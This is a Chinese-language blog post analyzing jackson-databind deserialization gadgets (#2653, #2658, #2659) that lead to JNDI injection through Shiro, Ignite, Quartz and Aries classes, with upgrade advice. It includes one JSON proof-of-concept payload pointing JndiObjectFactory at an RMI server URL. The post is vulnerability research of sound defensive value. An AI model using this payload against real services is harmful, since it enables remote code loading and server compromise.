zoukankan      html  css  js  c++  java
  • jackson-databind #2653 #2658 #2659 反序列化漏洞分析(暂无cve

    powered by UnicodeSec

    不受影响的版本

    jackson-databind >= 2.9.10.4
    jackson-databind >= 2.10.0

    如果你的业务中即存在jackson,并且开启了enableDefaultTypeing功能,又存在相关受影响的jar包,请更新jackson最新版。或者使用activatedefaulttyping代替enableDefaultTypeing

    可以查询jackson的黑名单过滤列表,分析相关poc,在如下网址

    https://github.com/FasterXML/jackson-databind/issues?q=label%3ACVE+is%3Aclosed

    #2653 shiro jndi注入

    org.apache.shiro.jndi.JndiObjectFactory

    该处代码如下

    public class JndiObjectFactory<T> extends JndiLocator implements Factory<T> {
    
        private String resourceName;
        private Class<? extends T> requiredType;
    
        public T getInstance() {
            try {
                if(requiredType != null) {
                    return requiredType.cast(this.lookup(resourceName, requiredType));
                } else {
                    return (T) this.lookup(resourceName);
                }
            } catch (NamingException e) {
                final String typeName = requiredType != null ? requiredType.getName() : "object";
                throw new IllegalStateException("Unable to look up " + typeName + " with jndi name '" + resourceName + "'.", e);
            }
        }
    }
    

    我们可以从JndiObjectFactory中看出,getInstance会调用lookup去查找rmi。如果存在requiredType,则转换为相关class,如果不存在就不会强转。JndiObjectFactory继承自JndiLocator,所以我们去JndiLocator的lookup函数继续分析,JndiLocator的lookup代码如下

        protected Object lookup(String jndiName, Class requiredType) throws NamingException {
            String convertedName = convertJndiName(jndiName);
            Object jndiObject;
            try {
                jndiObject = getJndiTemplate().lookup(convertedName, requiredType);
            }
    //... 省略不相关代码
            return jndiObject;
        }
    

    可以很清楚的看到,首先将jndiName转换,然后继续调用getJndiTemplate().lookup函数,getJndiTemplate().lookup的代码如下

        public Object lookup(String name, Class requiredType) throws NamingException {
            Object jndiObject = lookup(name);
            if (requiredType != null && !requiredType.isInstance(jndiObject)) {
                String msg = "Jndi object acquired under name '" + name + "' is of type [" +
                        jndiObject.getClass().getName() + "] and not assignable to the required type [" +
                        requiredType.getName() + "].";
                throw new NamingException(msg);
            }
            return jndiObject;
        }
    

    首先调用lookup,然后根据用户传入的参数,将rmi远程获取的类强制转换为用户提供的requiredType类,假如requiredType为null,则不去强制转换。

    lookup函数如下

        public Object lookup(final String name) throws NamingException {
            log.debug("Looking up JNDI object with name '{}'", name);
            return execute(new JndiCallback() {
                public Object doInContext(Context ctx) throws NamingException {
                    Object located = ctx.lookup(name);
                    if (located == null) {
                        throw new NameNotFoundException(
                                "JNDI object with [" + name + "] not found: JNDI implementation returned null");
                    }
                    return located;
                }
            });
        }
    

    该处存在典型的jndi注入。用户可以控制lookup的name参数,可以访问恶意rmi服务器去获取带有恶意信息的类。

    poc
    ["org.apache.shiro.jndi.JndiObjectFactory",{"resourceName":"rmi://127.0.0.1:1099/aa"}]
    

    org.apache.shiro.realm.jndi.JndiRealmFactory

    首先查看org.apache.shiro.realm.jndi.JndiRealmFactory的代码

        public Collection<Realm> getRealms() throws IllegalStateException {
    // ... 省略
            for (String name : jndiNames) {
                try {
                    Realm realm = (Realm) lookup(name, Realm.class);
                    realms.add(realm);
                } catch (Exception e) {
                    throw new IllegalStateException("Unable to look up realm with jndi name '" + name + "'.", e);
                }
            }
            return realms.isEmpty() ? null : realms;
        }
    

    可以很明显看出,在getRealms函数中,会调用lookup去作为rmi的参数。而lookup函数,其实就是上一个gadget的lookup函数。poc与上一个类似。

    #2658

    该楼栋编号有三个gadget

    1. org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup
    2. org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory
    3. org.quartz.utils.JNDIConnectionProvider

    org.quartz.utils.JNDIConnectionProvider

    在getConnection中存在rmi的lookup函数调用,并且该参数可以通过jackson在反序列化的时候设置

    https://github.com/quartz-scheduler/quartz/blob/master/quartz-core/src/main/java/org/quartz/utils/JNDIConnectionProvider.java

            Context ctx = null;
            try {
                Object ds = this.datasource;
    
                if (ds == null || isAlwaysLookup()) {
                    ctx = (props != null) ? new InitialContext(props): new InitialContext(); 
    
                    ds = ctx.lookup(url);
                    if (!isAlwaysLookup()) {
                        this.datasource = ds;
                    }
                }
    

    其他两个与该处gadget类似,故不再描述

    #2659

    该漏洞存在与org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory 查看代码中是否存在rmi的lookup引用

    https://www.javatips.net/api/aries-master/aries-trunk/transaction/transaction-jms/src/main/java/org/apache/aries/transaction/jms/internal/XaPooledConnectionFactory.java

        public TransactionManager getTransactionManager() {
            if (transactionManager == null && tmFromJndi) {
                try {
                    transactionManager = (TransactionManager) new InitialContext().lookup(getTmJndiName());
                } catch (Throwable ignored) {
                    if (LOG.isTraceEnabled()) {
                        LOG.trace("exception on tmFromJndi: " + getTmJndiName(), ignored);
                    }
                }
            }
            return transactionManager;
        }
    

    在getTransactionManager函数中调用rmi的lookup函数。可以通过jackson去注入恶意参数

  • 相关阅读:
    第一章嵌入式系统基础1.5嵌入式系统性能评价
    第一章嵌入式系统基础1.4
    1.3嵌入式系统的硬件基础
    学习第二天
    经典的删除字符串中指定的字符
    字符串的两种表示
    股票数据定向爬虫
    淘宝商品比价定向爬虫
    中国大学排名定向爬虫
    python小练习 批量修改文件名
  • 原文地址:https://www.cnblogs.com/potatsoSec/p/12510866.html
Copyright © 2011-2022 走看看